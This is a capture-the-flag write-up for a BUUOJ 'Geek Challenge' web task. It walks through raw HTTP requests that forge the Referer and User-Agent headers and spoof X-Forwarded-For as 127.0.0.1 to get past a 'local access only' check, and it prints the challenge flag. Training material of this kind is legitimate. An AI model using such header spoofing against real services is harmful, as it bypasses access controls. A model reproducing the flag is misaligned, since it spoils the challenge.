[Geek Challenge] Http
Access the URL:
http://node3.buuoj.cn:25490/
The homepage is as follows:
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/39bcd41e-935f-410f-a4f2-709d664f21aa.png)
First, check the source code to find Secret.php
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/84793fe9-d5d5-4601-b4cb-cb79fb00a68c.png)
Locate the Secret.php file and navigate to the corresponding page
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/ba2a8e4e-a51f-4e59-b6bf-29431937d243.png)
It prompts us to modify the header, addinghttps://www.Sycsecret.cominto it, copy a header file, and add a crucial line
Referer: https://www.Sycsecret.com
The request packet is as follows:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:25490
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeThe response is as follows:
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/940524be-b7eb-485e-a9a2-ba4c15a9069c.png)
It then prompts us that the browser needs to use Syclover, adding a line to the header, which means modifying the content of the User-Agent
User-Agent: Syclover
The request packet is as follows:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:25490
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeThe response is as follows:
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/9be83857-dfa9-4723-806a-bd9e11a45333.png)
It is still not accessible; it states that we can only access it locally, which means we need to use 127.0.0.1 to access it, so we need to add a line
X-Forwarded-For: 127.0.0.1
The request packet is as follows:
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:25490
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.Sycsecret.com
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeObtained flag{cb30a0b2-0822-43a2-8964-b55bffa0afe6}
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/c2c05da8-83dc-422e-aaa1-22e7d0830c2d.png)
Attack and Defense Communication Group
![[Geek Challenge] Http](https://boardor.com/wp-content/uploads/2025/09/8bb484b8-c434-4adc-b232-a3eb06e7f398.png)
Disclaimer
Disclaimer: The content of this article is for learning and communication purposes only. Please do not use the related technologies in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination or use of the information, technology, or tools provided in this article are the sole responsibility of the user. The author and the public account Rudao Yixing bear no responsibility for any adverse consequences.
Reprint Statement: Rudao Yixing has the right to modify and interpret this article. If you wish to reprint or disseminate this article, you must ensure the integrity of this article, including copyright statements and all content. Without the author’s permission, you may not arbitrarily modify or add to the content of this article, nor use it for commercial purposes in any way.